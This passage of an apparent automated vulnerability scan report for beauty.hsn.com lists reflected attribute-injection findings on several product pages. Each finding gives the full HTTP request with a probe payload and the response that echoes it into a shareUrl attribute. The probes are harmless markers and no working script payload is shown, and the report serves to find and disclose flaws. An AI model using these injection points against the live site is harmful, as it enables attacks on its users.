Set-Cookie: sitesession=pdPage=http%3a%2f%2fbeauty.hsn.com%3a80%2fmy-life-mary-j-blige-holiday-gift-set_p-6231363_xp.aspx%3fbf37a%22%2520a%253db%2520d1e776cafa1%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=CNJteWmoJh2q5VScWDRUTQ%3d%3d&tz=t5GsBRyIAi4%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:34 GMT; path=/
Set-Cookie: sessionid=id=3pLTW3IkU7t2VQE7A%2fkwLuXTUv6LaBR0nG1XBGt5Q%2fXGQSANqdRk%2bw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=uudE7M4ISY409wuMWJGeu4RHnQEwDYGYp51IWycQCjFJiUg8jwP3rw%3d%3d&abtid=W%2baYu7R3ONGbAYB%2b9FULmL6lXDq%2fEP8vC9dId%2bdjk3qPeHn9eWC0mQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:34 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:34:34 PM&signedIn=false&bagCount=0&wishCount=0&abValue=A; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=cii9xGFgK%2ff0yiMZE6UtnaLLMz%2b3Ff2ukRD38qFldvY%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=8689FAEC4C2C23C53FB53C880FE114B3; domain=.hsn.com; path=/
Set-Cookie: TLTHID=8689FAEC4C2C23C53FB53C880FE114B3; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:34:33 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 124149


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
url="http://www.hsn.com/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://beauty.hsn.com/my-life-mary-j-blige-holiday-gift-set_p-6231363_xp.aspx?bf37a" a=b d1e776cafa1=1&cm_mmc=sharingsite*email*PD*104619"
shareTitle="My Life&#174; Mary J. Blige Holiday Gift Set - AutoShip at HSN.com"
cmspTag="cm_sp=share*email*PD"
sty
...[SNIP]...

1.7. http://beauty.hsn.com/signature-club-a-by-adrienne-jet-tech-wet-set-perfect-beauty-collection_p-6199043_xp.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://beauty.hsn.com
Path:   /signature-club-a-by-adrienne-jet-tech-wet-set-perfect-beauty-collection_p-6199043_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8967f"%20a%3db%2016ada4605a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8967f" a=b 16ada4605a3 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /signature-club-a-by-adrienne-jet-tech-wet-set-perfect-beauty-collection_p-6199043_xp.aspx?8967f"%20a%3db%2016ada4605a3=1 HTTP/1.1
Host: beauty.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=B&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:35:41 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy%2fO5D1o8L2Tv2icTPfS1mQe&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fbeauty.hsn.com%3a80%2fsignature-club-a-by-adrienne-jet-tech-wet-set-perfect-beauty-collection_p-6199043_xp.aspx%3f8967f%22%2520a%253db%252016ada4605a3%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=dCJHGOPMFPSSrCvKz6ZVGw%3d%3d&tz=t5GsBRyIAi4%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:35:41 GMT; path=/
Set-Cookie: sessionid=id=zP1kghhy1YeD%2bgqe7k0w8YO4Wub9SmnGZu4yRCFm5bIKnFRpKujOaA%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=FZ5vA5%2bl3PuEE%2bIXbm9Dfdyu5cGR9JzgpeOkaBhq5uPKyR9XLVddOw%3d%3d&abtid=yMLuUBProkmnaFxc0c57mlnWyUMX5F8KIxD4dRv1TVmS4rYNMHVYyg%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:35:41 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:35:41 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=09JRRTo4KD6UN7njW31fEkdRR%2b2erly0mNd689mOCjk%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=878EA7FC44E607B3C5B8AA99A06C8DD9; domain=.hsn.com; path=/
Set-Cookie: TLTHID=878EA7FC44E607B3C5B8AA99A06C8DD9; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:35:41 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 147805


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
ail_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://beauty.hsn.com/signature-club-a-by-adrienne-jet-tech-wet-set-perfect-beauty-collection_p-6199043_xp.aspx?8967f" a=b 16ada4605a3=1&cm_mmc=sharingsite*email*PD*100328"
shareTitle="Signature Club A by Adrienne Jet Tech Wet Set Perfect Beauty Collection at HSN.com"
cmspTag="cm_sp=share*email*PD"

...[SNIP]...

1.8. http://beauty.hsn.com/wei-east-3-perfect-gifts-for-hands-body_p-6184302_xp.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://beauty.hsn.com
Path:   /wei-east-3-perfect-gifts-for-hands-body_p-6184302_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60ab6"%20a%3db%2073a87a02b3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 60ab6" a=b 73a87a02b3a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wei-east-3-perfect-gifts-for-hands-body_p-6184302_xp.aspx?60ab6"%20a%3db%2073a87a02b3a=1 HTTP/1.1
Host: beauty.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=B&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:34:58 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy9yoMOwFe8nm%2b0IarggmdmY&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fbeauty.hsn.com%3a80%2fwei-east-3-perfect-gifts-for-hands-body_p-6184302_xp.aspx%3f60ab6%22%2520a%253db%252073a87a02b3a%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=2DeknegkyigtQ9g3UAgyTQ%3d%3d&tz=t5GsBRyIAi4%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:59 GMT; path=/
Set-Cookie: sessionid=id=Y5GMv%2bU%2fvKHSDfb%2baCHTuzGsDrdJcyFByA%2fy4bH9%2fzL8C8%2bxYS5ajg%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=SbTZZTQmS8bXJBnQGEBIClr3%2bTcCUMUPGixYnmPdf76sRx%2f%2bg%2b4tvg%3d%3d&abtid=NZfg5idBeUl8YRvMSASJt%2bWN5Ul6f1Gn%2b78957ABAI3%2bfN9E7k%2b1Fg%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:58 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:34:59 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=w87nNKyKUJmfyM%2fj%2fEMyUEeKxr%2brbtZtcp%2bzXx0W%2fPE%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=DC6C8E2B420515F575BC32955F7C400F; domain=.hsn.com; path=/
Set-Cookie: TLTHID=DC6C8E2B420515F575BC32955F7C400F; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:34:58 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 113959


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
url="http://www.hsn.com/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://beauty.hsn.com/wei-east-3-perfect-gifts-for-hands-body_p-6184302_xp.aspx?60ab6" a=b 73a87a02b3a=1&cm_mmc=sharingsite*email*PD*968215"
shareTitle="Wei East 3 Perfect Gifts for Hands &amp; Body at HSN.com"
cmspTag="cm_sp=share*email*PD"
style="backgr
...[SNIP]...

1.9. http://beauty.hsn.com/wei-east-all-in-one-ageless-duo_p-6059427_xp.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://beauty.hsn.com
Path:   /wei-east-all-in-one-ageless-duo_p-6059427_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c50bf"%20a%3db%2084a1305fdee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c50bf" a=b 84a1305fdee in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wei-east-all-in-one-ageless-duo_p-6059427_xp.aspx?c50bf"%20a%3db%2084a1305fdee=1 HTTP/1.1
Host: beauty.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=B&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:34:56 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy81O%2fWenidlgG13HQdI25Ls&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fbeauty.hsn.com%3a80%2fwei-east-all-in-one-ageless-duo_p-6059427_xp.aspx%3fc50bf%22%2520a%253db%252084a1305fdee%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=PTZbYsFP8Jcoar2cu5uNZQ%3d%3d&tz=t5GsBRyIAi4%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:56 GMT; path=/
Set-Cookie: sessionid=id=4Djw26KVZP1hzf%2bagWnEUXCNo%2fkxginPjDuaEO3eiHeDWPTuk6wuYQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=j7Koq1qPRCEATWAmr%2b0ezCgNGIc9hi%2bCb0dIDKWVKooAVAizMu%2bHUg%3d%3d&abtid=oWrHmW6YQxK4NAX4Pmr1oO2CyfOowl511hX5RaTQabbXXXdVowVVIw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:56 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:34:56 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=3IpwWH9dKpSAVto8yWKYavBw1xKSMR103PjdwdzyvPQ%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=275135544D469242180CE39534AFB92C; domain=.hsn.com; path=/
Set-Cookie: TLTHID=275135544D469242180CE39534AFB92C; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:34:56 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 140183


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
url="http://www.hsn.com/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://beauty.hsn.com/wei-east-all-in-one-ageless-duo_p-6059427_xp.aspx?c50bf" a=b 84a1305fdee=1&cm_mmc=sharingsite*email*PD*956788"
shareTitle="Wei East All In One Ageless Duo at HSN.com"
cmspTag="cm_sp=share*email*PD"
style="background-position:
...[SNIP]...

1.10. http://beauty.hsn.com/wei-east-discover-chestnut-neck-decolletage-restore-cream-duo_p-6141894_xp.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://beauty.hsn.com
Path:   /wei-east-discover-chestnut-neck-decolletage-restore-cream-duo_p-6141894_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c46b"%20a%3db%2080a0863242e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c46b" a=b 80a0863242e in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wei-east-discover-chestnut-neck-decolletage-restore-cream-duo_p-6141894_xp.aspx?3c46b"%20a%3db%2080a0863242e=1 HTTP/1.1
Host: beauty.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=A&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=A; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:34:48 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy8083ZxSsiTi7uZOgPdXID0&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fbeauty.hsn.com%3a80%2fwei-east-discover-chestnut-neck-decolletage-restore-cream-duo_p-6141894_xp.aspx%3f3c46b%22%2520a%253db%252080a0863242e%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=ESKxso7z%2fWverdybCuzVkQ%3d%3d&tz=t5GsBRyIAi4%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:49 GMT; path=/
Set-Cookie: sessionid=id=v%2bpj0M6B47jQrIsfaC%2ft%2fbb0fxKO3hxlw9vYI9lrS%2butqtlG4mtyGQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=XaM12Sn3m2ETUnd3bHVVZWGq2CnYvEkAivcUpXv0dBu8uJyCe12XSw%3d%3d&abtid=7%2fjqK9uGEavMxT3FXl6r0naVlOCjIEleVmH4x9UJJSvCkU3ln%2bATpw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:48 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:34:49 PM&signedIn=false&bagCount=0&wishCount=0&abValue=A; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=HRGccXlUJ9DeJ15fxYDg%2fZ0ARTvjGRC%2bTW72pH%2fCm0o%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=A5B96CD64D09C38576D204ACA2F3702B; domain=.hsn.com; path=/
Set-Cookie: TLTHID=A5B96CD64D09C38576D204ACA2F3702B; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:34:49 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 113017


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
com/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://beauty.hsn.com/wei-east-discover-chestnut-neck-decolletage-restore-cream-duo_p-6141894_xp.aspx?3c46b" a=b 80a0863242e=1&cm_mmc=sharingsite*email*PD*963768"
shareTitle="Wei East Discover Chestnut Neck &amp; Decolletage Restore Cream Duo at HSN.com"
cmspTag="cm_sp=share*email*PD"

...[SNIP]...

1.11. http://beauty.hsn.com/wei-east-gifts-of-herbal-beauty-12-piece-china-herbal-collection_p-6184242_xp.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://beauty.hsn.com
Path:   /wei-east-gifts-of-herbal-beauty-12-piece-china-herbal-collection_p-6184242_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c813"%20a%3db%20941dc2f6ef4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8c813" a=b 941dc2f6ef4 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wei-east-gifts-of-herbal-beauty-12-piece-china-herbal-collection_p-6184242_xp.aspx?8c813"%20a%3db%20941dc2f6ef4=1 HTTP/1.1
Host: beauty.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=B&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:34:55 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy9yoMOwFe8nm3ieS89ivWzl&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fbeauty.hsn.com%3a80%2fwei-east-gifts-of-herbal-beauty-12-piece-china-herbal-collection_p-6184242_xp.aspx%3f8c813%22%2520a%253db%2520941dc2f6ef4%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=2Deknegkyih9Ivj54mYDrw%3d%3d&tz=t5GsBRyIAi4%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:56 GMT; path=/
Set-Cookie: sessionid=id=lin7%2fVsJFd5DTGuJG76NI8KIdcdlg0jnCEtpGxOo0djehYE4pgCUeQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=yZwu1ApC99PO8ve9wjKuCl%2fgkw9cDIpR%2b3yM8Alc4mCFXm0eKqNYdQ%3d%3d&abtid=gVeKY6LQIodXXcPYfmWJQKoUYL2Lh9hsjwmtTUOb8%2bdXDMM7FelRcg%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:55 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:34:56 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=ysNcD%2bsFDvKL3M0dd6d2mTeSMrOyZswZi4%2b%2bBGPULbA%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=070DA9DC4158BA9CEE1A20B63D272430; domain=.hsn.com; path=/
Set-Cookie: TLTHID=070DA9DC4158BA9CEE1A20B63D272430; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:34:55 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 115355


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://beauty.hsn.com/wei-east-gifts-of-herbal-beauty-12-piece-china-herbal-collection_p-6184242_xp.aspx?8c813" a=b 941dc2f6ef4=1&cm_mmc=sharingsite*email*PD*968208"
shareTitle="Wei East Gifts of Herbal Beauty 12-piece China Herbal Collection at HSN.com"
cmspTag="cm_sp=share*email*PD"

...[SNIP]...

1.12. http://beauty.hsn.com/wei-east-gifts-of-white-lotus-hydration-12-piece-collection_p-6184244_xp.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://beauty.hsn.com
Path:   /wei-east-gifts-of-white-lotus-hydration-12-piece-collection_p-6184244_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1957"%20a%3db%20de9bbf913e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e1957" a=b de9bbf913e4 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wei-east-gifts-of-white-lotus-hydration-12-piece-collection_p-6184244_xp.aspx?e1957"%20a%3db%20de9bbf913e4=1 HTTP/1.1
Host: beauty.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=A&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=A; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:34:53 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy9yoMOwFe8nm3L6LO035bO5&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fbeauty.hsn.com%3a80%2fwei-east-gifts-of-white-lotus-hydration-12-piece-collection_p-6184244_xp.aspx%3fe1957%22%2520a%253db%2520de9bbf913e4%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=2DeknegkyiitxzzCqW63dA%3d%3d&tz=t5GsBRyIAi4%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:53 GMT; path=/
Set-Cookie: sessionid=id=S4A5rjcMg27Vz7ASJBu2nIA4S%2fWnqFgxByiU51cWqqQDX9d6%2feFL2A%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=ah3xYnFKPpXBwZk2REujmfOACyrMCtCg3528FwU0ERfdgurWp2XxDw%3d%3d&abtid=414XoXx7ynogLx%2bZk6Qea9APjeSpb0StLKAiAkUgvVeByaCJPyiqTQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:53 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:34:53 PM&signedIn=false&bagCount=0&wishCount=0&abValue=A; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=e8TrygVMttuwXBROhUOepdsAahbDDzH1PD1GfaeD7qw%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=E7E422744822FF2438AE2AAC3CF3F2FF; domain=.hsn.com; path=/
Set-Cookie: TLTHID=E7E422744822FF2438AE2AAC3CF3F2FF; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:34:52 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 115330


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
n.com/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://beauty.hsn.com/wei-east-gifts-of-white-lotus-hydration-12-piece-collection_p-6184244_xp.aspx?e1957" a=b de9bbf913e4=1&cm_mmc=sharingsite*email*PD*968211"
shareTitle="Wei East Gifts of White Lotus Hydration 12-piece Collection at HSN.com"
cmspTag="cm_sp=share*email*PD"

...[SNIP]...

